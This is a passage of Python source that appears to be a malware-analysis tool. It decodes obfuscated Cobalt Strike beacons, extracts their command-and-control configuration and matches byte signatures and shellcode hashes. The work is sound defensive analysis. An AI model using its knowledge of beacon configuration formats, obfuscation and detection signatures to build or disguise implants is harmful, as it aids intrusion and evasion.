result = list(struct.unpack(format, data[:size]))
result.append(data[size:])
return result
def Represent(data):
if sum([ord(c) for c in data]) == 0:
return '(NULL ...)'
else:
return repr(data.rstrip('\x00'))
def PrefixIfNeeded(string, prefix=' '):
if string == '':
return string
else:
return prefix + string
def Xor(data, key):
data = C2SIP3(data)
key = C2SIP3(key)
return C2BIP3(''.join(chr(ord(data[i]) ^ ord(key[i % len(key)])) for i in range(len(data))))
def FindAll(data, sub):
result = []
start = 0
while True:
position = data.find(sub, start)
if position == -1:
return result
result.append(position)
start = position + 1
def FindAllList(data, searches):
result = []
for element in searches:
result.extend(FindAll(data, element))
return sorted(list(set(result)))
def DecodeSectionnameIfNeeded(name):
if len(name) == 0 or name.startswith('.'):
return name
xorkey = ord(name[0]) ^ ord('.')
newname = ''.join([chr(ord(c) ^ xorkey) for c in name]).rstrip('\x00')
return newname
def GetDataSection(data):
sectionnames = []
try:
oPE = pefile.PE(data=data)
except Exception as e:
return e.value, None
for section in oPE.sections:
if sys.version_info[0] >= 3:
sectionname = ''.join(filter(lambda c:c != '\0', str(section.Name.decode('unicode_escape'))))
else:
sectionname = ''.join(filter(lambda c:c != '\0', section.Name))
sectionnames.append(repr(sectionname))
if DecodeSectionnameIfNeeded(sectionname) == '.data':
return None, section.get_data()
return '.data section not found: ' + ' '.join(sectionnames), None
def GetXorChainSection(data):
try:
oPE = pefile.PE(data=data)
except Exception as e:
return None, e.value
for section in oPE.sections:
extracted, messages = TryXORChainDecoding(section.get_data())
if messages != []:
return extracted, messages
return None, None
def StatisticalSearch(payloadsectiondata, key):
start = None
end = None
position = 0
while len(payloadsectiondata) > 8:
block, payloadsectiondata = GetChunk(8, payloadsectiondata)
if sum([IFF(c == key, 1, 0) for c in block]) > 2:
if start == None:
start = position
end = position + 7
else:
end = position + 7
position += 8
return start, end
def Bytes2IPv4(data):
return '%d.%d.%d.%d' % (P23Ord(data[0]), P23Ord(data[1]), P23Ord(data[2]), P23Ord(data[3]))
def FindAF_INET_PORT(operand):
if P23Ord(operand[0]) != 2:
return ''
if P23Ord(operand[1]) != 0:
return ''
return '%d' % struct.unpack('>H', operand[2:4])[0]
def IdentifyShellcode(shellcode):
if hashlib.sha256(shellcode[:346]).hexdigest() == '946af5a23e5403ea1caccb2e0988ec1526b375a3e919189f16491eeabc3e7d8c':
return 'CS psexec psh x86 shellcode, opens named pipe'
elif hashlib.sha256(shellcode[:191]).hexdigest() == '02fd615831f5cc22d83ad681d33159d232afc3b18b69f647f1726280e2d7e3f3':
return 'CS reverse http x86 shellcode'
elif hashlib.sha256(shellcode[:271]).hexdigest() == 'bf413ba9b63b6777c4765581bf42c1fdb119f1ed22836cfaa80e616e2a3bf795':
return 'CS reverse http x64 shellcode'
elif hashlib.sha256(shellcode[:196]).hexdigest() == '52230666746fa8c9ec635083b05943d02bfe516fc45ea9c87eef300b9cd064e8':
return 'CS reverse https x86 shellcode'
elif hashlib.sha256(shellcode[:274]).hexdigest() == 'acffe4f9fd8f82044772627a4174f14abf873a8e783c31353bf094118f3c1706':
return 'CS reverse https x64 shellcode'
elif hashlib.sha256(shellcode[:330]).hexdigest() == 'a82872e2d839cd2ee1b0c2324b83f2686284ebe3eef5e9fb0c9e97db8d86cbf4':
return 'CS DNS x86 shellcode'
return ''
def AnalyzeShellcode(shellcode, oOutput):
dInstructions = {b'\x68': 'push', b'\xB8': 'mov eax'}
dJSONData = GetJSONData()
dLookupValues = dJSONData.get('dLookupValues', {})
identification = IdentifyShellcode(shellcode)
if identification != '':
oOutput.Line('Identification: %s' % identification)
position = shellcode.rfind(b'\xFF\xFF')
if position != -1:
parameters = shellcode[position+2:]
position00 = parameters.find(b'\x00')
remainder = b''
if position00 != -1:
remainder = parameters[position00 + 1:]
parameters = parameters[:position00]
oOutput.Line('Parameter: %d %s' % (position, repr(parameters)))
if len(remainder) == 4:
licenseid = struct.unpack('>I',remainder)[0]
info = 'license-id: %d %d' % (position + position00 + 1, licenseid)
info += LookupValue("37", '%d' % licenseid, dLookupValues)
oOutput.Line(info)
for pushPosition in FindAllList(shellcode, dInstructions.keys()):
if pushPosition + 5 <= len(shellcode):
if position == -1:
operand = shellcode[pushPosition + 1:pushPosition + 5]
oOutput.Line('%-10s: %5d %10d %5s %-16s %s' % (dInstructions[shellcode[pushPosition:pushPosition+1]], pushPosition, struct.unpack('<I', operand)[0], FindAF_INET_PORT(operand), Bytes2IPv4(operand), repr(shellcode[pushPosition:pushPosition + 5])))
elif shellcode[pushPosition + 3:pushPosition + 5] == b'\x00\x00':
oOutput.Line('%-10s: %5d %10d %s' % (dInstructions[shellcode[pushPosition:pushPosition+1]], pushPosition, struct.unpack('<H', shellcode[pushPosition + 1:pushPosition + 3])[0], repr(shellcode[pushPosition:pushPosition + 5])))
for str in ExtractStringsASCII(shellcode):
if len(str) == 5 and str.startswith(b'/') or str.startswith(b'User-Agent: ') or str.startswith(b'Mozilla/'):
positions = FindAll(shellcode, str)
oOutput.Line('String: %s %s' % (','.join(['%d' % position for position in positions]),str))
REGEX_STANDARD = b'[\x09\x20-\x7E]'
def ExtractStringsASCII(data):
regex = REGEX_STANDARD + b'{%d,}'
return re.findall(regex % 1, data)
def LookupConfigValue(id, value):
dConfigValues = {
0x0001: {
0: 'windows-beacon_http-reverse_http',
1: 'windows-beacon_dns-reverse_http',
2: 'windows-beacon_smb-bind_pipz',
4: 'windows-beacon_tcp-reverse_tcp',
8: 'windows-beacon_https-reverse_https',
16: 'windows-beacon_tcp-bind_tcp',
32: 'to be determined',
},
0x0023: {
1: 'no proxy',
2: 'IE settings',
4: 'hardcoded proxy',
},
0x002b: {
0x01: 'PAGE_NOACCESS',
0x02: 'PAGE_READONLY',
0x04: 'PAGE_READWRITE',
0x08: 'PAGE_WRITECOPY',
0x10: 'PAGE_EXECUTE',
0x20: 'PAGE_EXECUTE_READ',
0x40: 'PAGE_EXECUTE_READWRITE',
0x80: 'PAGE_EXECUTE_WRITECOPY',
},
}
return PrefixIfNeeded(dConfigValues[id].get(value, ''))
def ConvertIntToIPv4(value):
return ' %d.%d.%d.%d' % (C2IIP2(value[0]), C2IIP2(value[1]), C2IIP2(value[2]), C2IIP2(value[3]))
def ToHexadecimal(value):
if isinstance(value, int):
return '%x' % value
else:
return binascii.b2a_hex(value).decode()
def LookupValue(number, value, dInfo, verbose=False):
lookup = ''
if number in dInfo:
lookup = dInfo[number].get(value, '')
if isinstance(lookup, dict):
message = lookup['normal']
if verbose:
message += ' (%s)' % lookup['verbose']
lookup = message
return PrefixIfNeeded(lookup)
def InterpretValue(info, number, value, dConfigValueInterpreter):
interpreted = ''
if number in dConfigValueInterpreter:
interpreted = dConfigValueInterpreter[number](value)
return info + interpreted
def GetScriptPath():
if getattr(sys, 'frozen', False):
return os.path.dirname(sys.executable)
else:
return os.path.dirname(sys.argv[0])
def DetermineCSVersionFromConfig(dJSON):
maximumID = max(map(int, dJSON.keys()))
if maximumID < 55:
return ('3', maximumID)
elif maximumID == 55:
return ('4.0', maximumID)
elif maximumID > 55 and maximumID < 58:
return ('4.1', maximumID)
elif maximumID == 58:
return ('4.2', maximumID)
elif maximumID == 70:
return ('4.3', maximumID)
else:
return ('4.4', maximumID)
def SanityCheckExtractedConfig(dJSON):
if not 1 in dJSON:
return False
if not 7 in dJSON:
return False
if LookupConfigValue(1, dJSON[1]['rawvalue']) == '':
return False
if not isinstance(dJSON[7]['rawvalue'], str):
return False
if not dJSON[7]['rawvalue'].startswith('308'):
return False
return True
def GetJSONData():
filename = os.path.join(GetScriptPath(), '1768b.json')
if os.path.isfile(filename):
return json.load(open(filename, 'r'))
filename = os.path.join(GetScriptPath(), '1768.json')
if os.path.isfile(filename):
return json.load(open(filename, 'r'))
return {}
class cStruct(object):
def __init__(self, data):
self.data = data
self.originaldata = data
def Unpack(self, format):
formatsize = struct.calcsize(format)
if len(self.data) < formatsize:
raise Exception('Not enough data')
tounpack = self.data[:formatsize]
self.data = self.data[formatsize:]
result = struct.unpack(format, tounpack)
if len(result) == 1:
return result[0]
else:
return result
def Truncate(self, length):
self.data = self.data[:length]
def GetBytes(self, length=None):
if length == None:
length = len(self.data)
result = self.data[:length]
self.data = self.data[length:]
return result
def GetString(self, format):
stringLength = self.Unpack(format)
return self.GetBytes(stringLength)
def Length(self):
return len(self.data)
# https://www.usualsuspect.re/article/cobalt-strikes-malleable-c2-under-the-hood
INSTRUCTION_TYPE_MALLEABLE_C2 = 1
INSTRUCTION_TYPE_GET = 2
INSTRUCTION_TYPE_POST = 3
INSTRUCTION_NONE = 0
INSTRUCTION_APPEND = 1
INSTRUCTION_PREPEND = 2
INSTRUCTION_BASE64 = 3
INSTRUCTION_PRINT = 4
INSTRUCTION_PARAMETER = 5
INSTRUCTION_HEADER = 6
INSTRUCTION_BUILD = 7
INSTRUCTION_NETBIOS = 8
INSTRUCTION_CONST_PARAMETER = 9
INSTRUCTION_CONST_HEADER = 10
INSTRUCTION_NETBIOSU = 11
INSTRUCTION_URI_APPEND = 12
INSTRUCTION_BASE64URL = 13
INSTRUCTION_STRREP = 14
INSTRUCTION_MASK = 15
INSTRUCTION_CONST_HOST_HEADER = 16
def DecodeInstructions(value, instructionsType):
oStruct = cStruct(value)
instructions = []
opcodes = []
buildFlag = False
while oStruct.Length() >= 4:
opcode = oStruct.Unpack('>I')
if buildFlag and opcode in [0, 6, 7, 10, 16]:
instructions.append('Build End')
opcodes.append(['7', 'End'])
buildFlag = False
if opcode == INSTRUCTION_NONE:
break
if opcode == INSTRUCTION_APPEND:
if instructionsType == INSTRUCTION_TYPE_MALLEABLE_C2:
operand = oStruct.Unpack('>I')
instructions.append('Remove %d bytes from end' % operand)
opcodes.append([str(opcode), str(operand)])
else:
operand = oStruct.GetString('>I').decode('latin')
instructions.append('Append %s' % operand)
opcodes.append([str(opcode), operand])
elif opcode == INSTRUCTION_PREPEND:
if instructionsType == INSTRUCTION_TYPE_MALLEABLE_C2:
operand = oStruct.Unpack('>I')
instructions.append('Remove %d bytes from begin' % operand)
opcodes.append([str(opcode), str(operand)])
else:
operand = oStruct.GetString('>I').decode('latin')
instructions.append('Prepend %s' % operand)
opcodes.append([str(opcode), operand])
elif opcode == INSTRUCTION_BASE64:
instructions.append('BASE64')
opcodes.append([str(opcode)])
elif opcode == INSTRUCTION_PRINT:
instructions.append('Print')
opcodes.append([str(opcode)])
elif opcode == INSTRUCTION_PARAMETER:
operand = oStruct.GetString('>I').decode('latin')
instructions.append('Parameter %s' % operand)
opcodes.append([str(opcode), operand])
elif opcode == INSTRUCTION_HEADER:
operand = oStruct.GetString('>I').decode('latin')
instructions.append('Header %s' % operand)
opcodes.append([str(opcode), operand])
elif opcode == INSTRUCTION_BUILD:
buildFlag = True
operand = oStruct.Unpack('>I')
if instructionsType == INSTRUCTION_TYPE_POST:
if operand == 0:
operand = 'SessionId'
else:
operand = 'Output'
else:
operand = 'Metadata'
instructions.append('Build %s' % operand)
opcodes.append([str(opcode), operand])
elif opcode == INSTRUCTION_NETBIOS:
instructions.append('NETBIOS lowercase')
opcodes.append([str(opcode)])
elif opcode == INSTRUCTION_CONST_PARAMETER:
operand = oStruct.GetString('>I').decode('latin')
instructions.append('Const_parameter %s' % operand)
opcodes.append([str(opcode), operand])
elif opcode == INSTRUCTION_CONST_HEADER:
operand = oStruct.GetString('>I').decode('latin')
instructions.append('Const_header %s' % operand)
opcodes.append([str(opcode), operand])
elif opcode == INSTRUCTION_NETBIOSU:
instructions.append('NETBIOS uppercase')
opcodes.append([str(opcode)])
elif opcode == INSTRUCTION_URI_APPEND:
instructions.append('Uri_append')
opcodes.append([str(opcode)])
elif opcode == INSTRUCTION_BASE64URL:
instructions.append('BASE64 URL')
opcodes.append([str(opcode)])
elif opcode == INSTRUCTION_STRREP:
operand1 = oStruct.GetString('>I').decode('latin')
operand2 = oStruct.GetString('>I').decode('latin')
instructions.append('STRREP %s %s' % (operand1, operand2))
opcodes.append([str(opcode), operand1, operand2])
elif opcode == INSTRUCTION_MASK:
instructions.append('XOR with 4-byte random key')
opcodes.append([str(opcode)])
elif opcode == INSTRUCTION_CONST_HOST_HEADER:
operand = oStruct.GetString('>I').decode('latin')
instructions.append('Const_host_header %s' % operand)
opcodes.append([str(opcode), operand])
else:
instructions.append('Unknown instruction: 0x%02x' % opcode)
opcodes.append([str(opcode)])
result = []
buildFlag = False
for instruction in instructions:
if instruction == 'Build End':
result.append(build)
elif instruction.startswith('Build '):
build = [instruction]
buildFlag= True
elif buildFlag:
build.append(instruction)
else:
result.append(instruction)
instructions = result
result = []
buildFlag = False
for opcode in opcodes:
if opcode == ['7', 'End']:
result.append(build)
elif opcode[0] == '7':
build = [opcode]
buildFlag= True
elif buildFlag:
build.append(opcode)
else:
result.append(opcode)
opcodes = result
if instructionsType == INSTRUCTION_TYPE_MALLEABLE_C2:
instructions = [['Transform Input'] + instructions]
opcodes = [[['7', 'Input']] + opcodes]
return [instructions, opcodes]
def DecodeMalleableC2Instructions(parameter):
instructions, opcodes = DecodeInstructions(parameter, INSTRUCTION_TYPE_MALLEABLE_C2)
buildOpcodes = ','.join([item for opcode in opcodes for item in opcode])
return 'Instructions: ' + ','.join(instructions) + ' [7,Input,' + buildOpcodes + ']'
def AnalyzeEmbeddedPEFileSub(payloadsectiondata, options):
result = []
if options.xorkeys:
for xorKey in range(256):
xorKeyBytes = bytes([xorKey])
startConfigXored = Xor(START_CONFIG, xorKeyBytes)
for position in FindAll(payloadsectiondata, startConfigXored):
result, dJSON = AnalyzeEmbeddedPEFileSub2(Xor(payloadsectiondata[position:position+0x10000], xorKeyBytes), result, options)
if result != [ERROR_SANITY_CHECK]:
return result, dJSON
return [result, {}]
xorKey = b'i'
config, startconfig, endconfig = CutData(Xor(payloadsectiondata, xorKey), '[000100010002]:')
if len(config) == 0:
xorKey = b'.'
config, startconfig, endconfig = CutData(Xor(payloadsectiondata, xorKey), '[000100010002]:')
if len(config) == 0:
xorKey = b'i'
startconfig, endconfig = StatisticalSearch(payloadsectiondata, xorKey)
if startconfig == None:
xorKey = b'.'
startconfig, endconfig = StatisticalSearch(payloadsectiondata, xorKey)
if startconfig == None:
result.append(ERROR_NO_CONFIG)
return [result, {}]
else:
result.append('Config found (statistical): xorkey %s 0x%08x 0x%08x' % (xorKey, startconfig, endconfig))
result.append(cDump(Xor(payloadsectiondata[startconfig:endconfig + 1], xorKey)).HexAsciiDump(rle=True))
return [result, {}]
# result.append('Config found: 0x%08x 0x%08x %s' % (startconfig, endconfig, ' '.join(['0x%08x' % position for position in FindAll(payloadsectiondata, '\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF')])))
# result.append('Config found: 0x%08x 0x%08x %s' % (startconfig, endconfig, ' '.join(['0x%08x' % position for position in FindAll(payloadsectiondata, '\x90\x01\x00\x00')])))
result.append('Config found: xorkey %s 0x%08x 0x%08x' % (xorKey, startconfig, endconfig))
data = config
return AnalyzeEmbeddedPEFileSub2(data, result, options)
def AnalyzeEmbeddedPEFileSub2(data, result, options):
dJSON = {}
dConfigIdentifiers = {
0x0001: 'payload type',
0x0002: 'port',
0x0003: 'sleeptime',
0x0004: 'maxgetsize', #
0x0005: 'jitter',
0x0006: 'maxdns',
0x0007: 'publickey',
0x0008: 'server,get-uri',
0x0009: 'useragent',
0x000a: 'post-uri',
0x000b: 'Malleable_C2_Instructions', #
0x000c: 'http_get_header',
0x000d: 'http_post_header',
0x000e: 'SpawnTo', #
0x000f: 'pipename',
0x0010: 'killdate_year', #
0x0011: 'killdate_month', #
0x0012: 'killdate_day', #
0x0013: 'DNS_Idle', #
0x0014: 'DNS_Sleep', #
0x0015: 'SSH_HOST', #
0x0016: 'SSH_PORT', #
0x0017: 'SSH_USER-NAME', #
0x0018: 'SSH_PASSWORD', #
0x0019: 'SSH_PUBKEY', #
0x001a: 'get-verb',
0x001b: 'post-verb',
0x001c: 'HttpPostChunk', #
0x001d: 'spawnto_x86',
0x001e: 'spawnto_x64',
0x001f: 'CryptoScheme', #
0x0020: 'proxy',
0x0021: 'proxy_username',
0x0022: 'proxy_password',
0x0023: 'proxy_type',
0x0024: 'deprecated', #
0x0025: 'license-id',
0x0026: 'bStageCleanup', #
0x0027: 'bCFGCaution', #
0x0028: 'killdate',
0x0029: 'textSectionEnd', #
0x002a: 'ObfuscateSectionsInfo', #
0x002b: 'process-inject-start-rwx',
0x002c: 'process-inject-use-rwx',
0x002d: 'process-inject-min_alloc',
0x002e: 'process-inject-transform-x86',
0x002f: 'process-inject-transform-x64',
0x0030: 'DEPRECATED_PROCINJ_ALLOWED',
0x0031: 'BIND_HOST',
0x0032: 'UsesCookies',
0x0033: 'process-inject-execute',
0x0034: 'process-inject-allocation-method',
0x0035: 'process-inject-stub',
0x0036: 'HostHeader',
0x0037: 'EXIT_FUNK',
0x0038: 'SSH_BANNER',
0x0039: 'SMB_FRAME_HEADER',
0x003a: 'TCP_FRAME_HEADER',
0x003b: 'HEADERS_TO_REMOVE',
0x003c: 'DNS_beacon',
0x003d: 'DNS_A',
0x003e: 'DNS_AAAA',
0x003f: 'DNS_TXT',
0x0040: 'DNS_metadata',
0x0041: 'DNS_output',
0x0042: 'DNS_resolver',
0x0043: 'DNS_STRATEGY',
0x0044: 'DNS_STRATEGY_ROTATE_SECONDS',
0x0045: 'DNS_STRATEGY_FAIL_X',
0x0046: 'DNS_STRATEGY_FAIL_SECONDS',
0x0047: 'MAX_RETRY_STRATEGY_ATTEMPTS',
0x0048: 'MAX_RETRY_STRATEGY_INCREASE',
0x0049: 'MAX_RETRY_STRATEGY_DURATION',
}
dConfigValueInterpreter = {
0x0001: lambda value: LookupConfigValue(0x0001, value),
0x0007: ToHexadecimal,
0x000b: DecodeMalleableC2Instructions,
0x0013: ConvertIntToIPv4,
0x0023: lambda value: LookupConfigValue(0x0023, value),
0x002b: lambda value: LookupConfigValue(0x002b, value),
0x002c: lambda value: LookupConfigValue(0x002b, value),
}
dJSONData = GetJSONData()
dLookupValues = dJSONData.get('dLookupValues', {})
while len(data) >= 2:
formatNumber = '>H'
formatTypeLength = '>HH'
ntlBytes = data[0:struct.calcsize(formatNumber) + struct.calcsize(formatTypeLength)]
try:
number, data = Unpack(formatNumber, data)
except UnpackErrorNotEnoughData:
break
if number == 0:
result.append('0x%04x' % number)
break
try:
type, length, data = Unpack(formatTypeLength, data)
except UnpackErrorNotEnoughData:
break
parameter, data = GetChunk(length, data)
info = ''
rawvalue = None
if type == 1 and length == 2:
identifier = struct.unpack('>H', parameter)[0]
rawvalue = identifier
info = InterpretValue('%d' % identifier, number, identifier, dConfigValueInterpreter)
elif type == 2 and length == 4:
if number in [0x44, 0x45, 0x46]:
rawvalue = struct.unpack('>i', parameter)[0]
else:
rawvalue = struct.unpack('>I', parameter)[0]
value = '%d' % rawvalue
info = InterpretValue(value, number, parameter[0:4], dConfigValueInterpreter)
info += LookupValue(str(number), value, dLookupValues, options.verbose)
elif type == 3 and not number in [0x0b, 0x0c, 0x0d]:
info = InterpretValue('', number, parameter, dConfigValueInterpreter)
rawvalue = binascii.b2a_hex(parameter).decode()
if info == '':
info = Represent(C2SIP3(parameter))
info += LookupValue(str(number), rawvalue, dLookupValues, options.verbose)
resultNumber = '0x%04x' % number
resultType = '0x%04x' % type
resultLength = '0x%04x' % length
resultID = dConfigIdentifiers.get(number, '')
dJSON[number] = {'id': resultID, 'type': resultType, 'info': info, 'rawvalue': rawvalue}
if options.csv:
result.append(MakeCSVLine((resultNumber, resultID, resultType, resultLength, info)))
else:
resultID = ('%-' + str(max([len(value) for value in dConfigIdentifiers.values()])) + 's') % resultID
result.append('%s %s %s %s%s' % (resultNumber, resultID, resultType, resultLength, PrefixIfNeeded(info)))
if type == 3 and number in [0x0b, 0x0c, 0x0d]:
instructions, opcodes = DecodeInstructions(parameter, {0x0b: INSTRUCTION_TYPE_MALLEABLE_C2, 0x0c: INSTRUCTION_TYPE_GET, 0x0d: INSTRUCTION_TYPE_POST}[number])
for index, instruction in enumerate(instructions):
if isinstance(instruction, str):
if options.csv:
result.append(MakeCSVLine(('', '', '', '', instruction)))
else:
result.append(' %s' % instruction)
else:
buildOpcodes = ','.join([':'.join(opcode) for opcode in opcodes[index]])
if number in dJSON:
if dJSON[number]['info'] == '':
dJSON[number]['info'] = buildOpcodes
else:
dJSON[number]['info'] += ';' + buildOpcodes
else:
dJSON[number] = {'id': resultID, 'type': resultType, 'info': buildOpcodes, 'rawvalue': binascii.b2a_hex(parameter).decode()}
if options.csv:
result.append(MakeCSVLine(('', '', '', '', '%s:[%s]' % (instruction[0], buildOpcodes))))
else:
result.append(' %s: [%s]' % (instruction[0], buildOpcodes))
for buildStep in instruction[1:]:
if options.csv:
result.append(MakeCSVLine(('', '', '', '', buildStep)))
else:
result.append(' %s' % buildStep)
# for string in ExtractStringsASCII(parameter):
# if options.csv:
# result.append(MakeCSVLine(('', '', '', '', string.decode('utf8', 'surrogateescape')), ',', '"'))
# else:
# result.append(' %s' % string.decode('utf8', 'surrogateescape'))
if options.select != '':
select = ParseInteger(options.select)
if number == select:
result.append(' Decoded: %s' % ToHexadecimal(ntlBytes + parameter))
result.append(" 'i'-encoded: %s" % ToHexadecimal(Xor(ntlBytes + parameter, b'i')))
result.append(" '.'-encoded: %s" % ToHexadecimal(Xor(ntlBytes + parameter, b'.')))
result.append('Guessing Cobalt Strike version: %s (max 0x%04x)' % DetermineCSVersionFromConfig(dJSON))
sanityCheck = SanityCheckExtractedConfig(dJSON)
result.append('Sanity check Cobalt Strike config: %s' % ('OK' if sanityCheck else 'NOK'))
if options.sanitycheck and not sanityCheck:
return [[ERROR_SANITY_CHECK], {}]
return [result, dJSON]
def AnalyzeEmbeddedPEFile(payloadsectiondata, oOutput, options):
result, dJSON = AnalyzeEmbeddedPEFileSub(payloadsectiondata, options)
oOutput.JSON(dJSON)
for line in result:
oOutput.Line(line)
def DetectPEFile(data):
if len(data) < 40:
return False
if data[0:2] != b'MZ':
return False
offsetbytes = data[0x3C:0x3C + 4]
if len(offsetbytes) != 4:
return False
offset = struct.unpack('<I', offsetbytes)[0]
if data[offset:offset + 2] != b'PE':
return False
return True
def StripLeadingNOPs(data):
return data.lstrip(b'\x90')
def XORChainSlow(iKey, encodedData):
decodedData = b''
xorkey = iKey
while len(encodedData) >= 4:
encoded = struct.unpack('<I', encodedData[0:4])[0]
decodedData += struct.pack('<I', encoded ^ xorkey)
xorkey = encoded
encodedData = encodedData[4:]
return decodedData
def XORChainFast(iKey, encodedData):
oDATA = DataIO()
xorkey = iKey
index = 0
format = '<I'
formatLength = struct.calcsize(format)
while True:
bytesInteger = encodedData[index:index + formatLength]
if len(bytesInteger) != formatLength:
break
encoded = struct.unpack(format, bytesInteger)[0]
oDATA.write(struct.pack(format, encoded ^ xorkey))
xorkey = encoded
index += formatLength
return oDATA.getvalue()
def XORChain(iKey, encodedData):
fast = XORChainFast(iKey, encodedData)
return fast
slow = XORChainSlow(iKey, encodedData)
if slow != fast:
raise Exception('slow != fast')
return fast
def TryXORChainDecoding(data):
if len(data) < 0x100:
return data, []
formatstring = '<II'
formatLength = struct.calcsize(formatstring)
startLength = 16
for iIter in range(1, 0x1000):
bytesValues = data[iIter:iIter + formatLength + startLength]
if len(bytesValues) != formatLength + startLength:
return data, []
xorKey, xorEncodedLength = struct.unpack(formatstring, bytesValues[:formatLength])
decodedLength = xorKey ^ xorEncodedLength
decodedStart = XORChain(xorKey, bytesValues[formatLength:])
if StripLeadingNOPs(decodedStart)[0:2] == b'MZ':
decodedData = StripLeadingNOPs(XORChain(xorKey, data[iIter + formatLength:iIter + formatLength + decodedLength]))
if DetectPEFile(decodedData):
return decodedData, ['xorkey(chain): 0x%08x' % xorKey, 'length: 0x%08x' % decodedLength]
if b'MZRE' in decodedStart or b'MZAR' in decodedStart:
decodedData = XORChain(xorKey, data[iIter + formatLength:iIter + formatLength + decodedLength])
if START_CONFIG_I in decodedData or START_CONFIG_DOT in decodedData:
return decodedData, ['xorkey(chain): 0x%08x' % xorKey, 'length: 0x%08x' % decodedLength]
return data, []
def TryExtractDecode(data):
if DetectPEFile(data):
return data, []
extracted = StripLeadingNOPs(data)
if DetectPEFile(extracted):
return extracted, ['leading NOPs: 0x%04x' % (len(data) - len(extracted))]
extracted, messages = TryXORChainDecoding(data)
if DetectPEFile(extracted):
return extracted, messages
if START_CONFIG_I in extracted or START_CONFIG_DOT in extracted:
return extracted, messages
return data, []
def TestShellcodeHeuristic(data):
return b'hwini' in data[:0x1000] or b'hws2_' in data[:0x1000] or (data[0:1] == b'\xFC' and len(data) < 0x1000)
def FinalTests(data, options, oOutput):
dSignatures = {
# https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures
'Sleep mask 64-bit 4.2 deobfuscation routine': b'\x4C\x8B\x53\x08\x45\x8B\x0A\x45\x8B\x5A\x04\x4D\x8D\x52\x08\x45\x85\xC9\x75\x05\x45\x85\xDB\x74\x33\x45\x3B\xCB\x73\xE6\x49\x8B\xF9\x4C\x8B\x03',
'Sleep mask 32-bit 4.2 deobfuscation routine': b'\x8B\x46\x04\x8B\x08\x8B\x50\x04\x83\xC0\x08\x89\x55\x08\x89\x45\x0C\x85\xC9\x75\x04\x85\xD2\x74\x23\x3B\xCA\x73\xE6\x8B\x06\x8D\x3C\x08\x33\xD2',
'Public key config entry': b'\x00\x07\x00\x03\x01\x00\x30\x81\x9F\x30\x0D\x06\x09\x2A\x86\x48\x86\xF7\x0D\x01\x01\x01\x05\x00\x03\x81\x8D\x00\x30\x81\x89\x02\x81',
}
for name, signature in dSignatures.items():
xorKeys = [b'\x00']
if name == 'Public key config entry':
xorKeys = [b'\x00', b'\x2e', b'\x69']
if options.xorkeys:
xorKeys = [bytes([iter]) for iter in range(256)]
for xorKey in xorKeys:
signatureXored = Xor(signature, xorKey)
for position in FindAll(data, signatureXored):
stringsInFront = sorted(ExtractStringsASCII(data[position-0x100:position]), key=len, reverse=True)
if len(stringsInFront) > 0:
longestString = ' (LSFIF: %s)' % stringsInFront[0]
else:
longestString = ''
oOutput.Line('%s found: 0x%08x%s%s' % (name, position, IFF(xorKey == b'\x00', '', ' (xorKey %s)' % xorKey), longestString))
if options.verbose:
oOutput.Line(cDump(data[position-0x100:position], ' ', position-0x100).HexAsciiDump(rle=True), eol='')
oOutput.Line(' ... signature ...')
oOutput.Line(cDump(data[position+len(signatureXored):position+len(signatureXored)+0x100], ' ', position+len(signatureXored)).HexAsciiDump(rle=True), eol='')
#a# this is a kludge, to fix later when I have time
def ProcessBinaryFileSub(sectiondata, data, oOutput, options):
payloadType, payloadSize, intxorkey, id2, sectiondata = Unpack('<IIII', sectiondata)
oOutput.Line('payloadType: 0x%08x' % payloadType)
oOutput.Line('payloadSize: 0x%08x' % payloadSize)
oOutput.Line('intxorkey: 0x%08x' % intxorkey)
oOutput.Line('id2: 0x%08x' % id2)
payload = Xor(sectiondata[:payloadSize], struct.pack('<I', intxorkey))
if payloadSize > len(sectiondata):
oOutput.Line('Error: payload size too large: 0x%08x' % payloadSize)
oOutput.Line('.data section size: 0x%08x' % len(sectiondata))
return False
error, payloadsectiondata = GetDataSection(payload)
if error != None:
positionMZ = payload.find(b'MZ')
if positionMZ != 0:
if START_CONFIG_I in sectiondata or START_CONFIG_DOT in sectiondata or options.xorkeys:
AnalyzeEmbeddedPEFile(data, oOutput, options)
elif TestShellcodeHeuristic(payload):
if IdentifyShellcode(payload) == '':
oOutput.Line('Probably found shellcode:')
else:
oOutput.Line('Found shellcode:')
AnalyzeShellcode(payload, oOutput)
oOutput.Line(cDump(payload).HexAsciiDump(rle=False))
elif positionMZ >= 0 and positionMZ < 0x20:
oOutput.Line('MZ header found position %d' % positionMZ)
AnalyzeEmbeddedPEFile(payload[positionMZ:], oOutput, options)
elif len(payload) == 0:
return False
else:
oOutput.Line('MZ header not found, truncated dump:')
oOutput.Line(cDump(payload[:0x1000]).HexAsciiDump(rle=True))
return False
else:
oOutput.Line('Error: embedded PE file error: %s' % error)
return False
else:
AnalyzeEmbeddedPEFile(payloadsectiondata, oOutput, options)
FinalTests(payload, options, oOutput)
return True
def ProcessBinaryFile(filename, content, cutexpression, flag, oOutput, oLogfile, options):
if content == None:
try:
oBinaryFile = cBinaryFile(filename, C2BIP3(options.password), options.noextraction, options.literalfilenames)
except:
oLogfile.LineError('Opening file %s %s' % (filename, repr(sys.exc_info()[1])))
return
oLogfile.Line('Success', 'Opening file %s' % filename)
try:
data = oBinaryFile.read()
except:
oLogfile.LineError('Reading file %s %s' % (filename, repr(sys.exc_info()[1])))
return
data = CutData(data, cutexpression)[0]
oBinaryFile.close()
oOutput.Line('File: %s%s' % (filename, IFF(oBinaryFile.extracted, ' (extracted)', '')))
else:
data = content
oOutput.Line('File: %s' % (filename))
if options.hash:
oOutput.Line('MD5 : %s' % hashlib.md5(data).hexdigest())
oOutput.Line('SHA1 : %s' % hashlib.sha1(data).hexdigest())
oOutput.Line('SHA256: %s' % hashlib.sha256(data).hexdigest())
try:
# ----- Put your data processing code here -----
data, messages = TryExtractDecode(data)
for message in messages:
oOutput.Line(message)
if data[0:2] == b'MZ' and not options.raw:
extracted, messages = GetXorChainSection(data)
if extracted != None:
resultChain, dJSON = AnalyzeEmbeddedPEFileSub(extracted, options)
if resultChain != [ERROR_NO_CONFIG]:
oOutput.JSON(dJSON)
for message in messages:
oOutput.Line(message)
for message in resultChain:
oOutput.Line(message)
FinalTests(extracted, options, oOutput)
else:
extracted = None
if extracted == None:
error, sectiondata = GetDataSection(data)
if error != None:
oOutput.Line('Error: PE file error: %s' % error)
elif len(sectiondata) < 16:
oOutput.Line('Error: section .data too small: %d' % len(sectiondata))
elif ProcessBinaryFileSub(sectiondata, data, oOutput, options):
pass
